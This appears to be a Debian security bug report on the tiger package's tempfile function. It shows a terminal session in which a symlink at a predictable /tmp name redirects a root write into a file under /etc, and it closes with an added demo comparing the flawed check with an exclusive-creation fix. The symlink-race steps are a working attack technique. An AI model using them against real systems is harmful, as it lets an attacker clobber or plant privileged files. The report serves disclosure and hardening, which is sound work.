Package: tiger
Version: 3.2.1-35
Severity: important
Tags: security
|#
|# Given a temporary file determines if it exists
|# if it does bails out since it shouldn't be there
|safe_temp()
|{
|  for __tmpfile
|  do
|    if [ -f "$__tmpfile" ] ; then
|      echo "--ERROR-- [init009e] Tempfile \`$__tmpfile' exists."
|      exit 1
|    else
|      >$__tmpfile
|    fi
|  done
|}
This is apparently supposed to be a safe and portable way of making tempfiles;
but tempfile wrappers are essentially guaranteed to be unsafe.
|$ ln -sv /etc/passwd-HAX0RED /tmp/tiger
|create symbolic link `/tmp/tiger' to `/etc/passwd-HAX0RED'
|$ ls -l /tmp/tiger
|lrwxrwxrwx 1 pryzbyj pryzbyj 19 2007-03-12 13:37 /tmp/tiger -> /etc/passwd-HAX0RED
|$ [ -e /tmp/tiger ] || echo nope
|nope
|$ > /tmp/tiger
|bash: /tmp/tiger: Permission denied
|$ sudo sh -c '> /tmp/tiger'
|Password:
|$ [ -e /tmp/tiger ] || echo nope
|$ ls -l /tmp/tiger
|lrwxrwxrwx 1 pryzbyj pryzbyj 19 2007-03-12 13:37 /tmp/tiger -> /etc/passwd-HAX0RED
|$ [ -e /etc/passwd-HAX0RED ] || echo nope
|$ sudo rm /etc/passwd-HAX0RED
|$ sudo sh -c '> /tmp/passwd-HAX0RED'
|$ ln -sv /etc/passwd-HAX0RED /tmp/tiger
|create symbolic link `/tmp/tiger' to `/etc/passwd-HAX0RED'
|$ sudo sh -c 'echo got ya >/tmp/tiger'
|$ cat /etc/passwd-HAX0RED
|got ya
Repeating with a range of $$ surrounding that expected for a tiger script is
left as an exercise to the reader...
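
Added example, not part of the original report or of tiger's own code: the reported check beside a variant that creates the file atomically with the shell's noclobber option, both run against a dangling symlink inside a private scratch directory. The names `unsafe_temp`, `safe_temp_excl`, `demo` and the scratch paths are assumptions made for this illustration, and `exit 1` is replaced by `return 1` so the functions can be called from a test.

```shell
#!/bin/sh
# Reported logic: "[ -f ]" is false for a dangling symlink, and ">" then
# follows the link and creates whatever file it points to.
unsafe_temp() {
    for __tmpfile
    do
        if [ -f "$__tmpfile" ]; then
            return 1
        else
            : > "$__tmpfile"
        fi
    done
}

# Hardened variant: with noclobber (set -C) the redirection creates the
# file exclusively, so an existing name, including a symlink with no
# target, is refused. The check and the creation are a single step.
safe_temp_excl() {
    for __tmpfile
    do
        ( set -C; umask 077; : > "$__tmpfile" ) 2>/dev/null || return 1
    done
}

# Constructed scenario: "$scratch/tiger.tmp" stands in for a predictable
# temp name, "$scratch/victim" for the file the link points at.
demo() {
    scratch=$(mktemp -d) || return 2
    target="$scratch/victim"
    link="$scratch/tiger.tmp"
    ln -s "$target" "$link"

    if unsafe_temp "$link"; then unsafe_rc=0; else unsafe_rc=1; fi
    if [ -e "$target" ]; then unsafe_created=yes; else unsafe_created=no; fi
    rm -f "$target"

    if safe_temp_excl "$link"; then excl_rc=0; else excl_rc=1; fi
    if [ -e "$target" ]; then excl_created=yes; else excl_created=no; fi

    rm -rf "$scratch"
    echo "unsafe: rc=$unsafe_rc target_created=$unsafe_created"
    echo "excl:   rc=$excl_rc target_created=$excl_created"
}

demo
```

Exclusive creation closes the check-then-create gap but leaves the name predictable; `mktemp` picks an unpredictable name and creates it exclusively in one call.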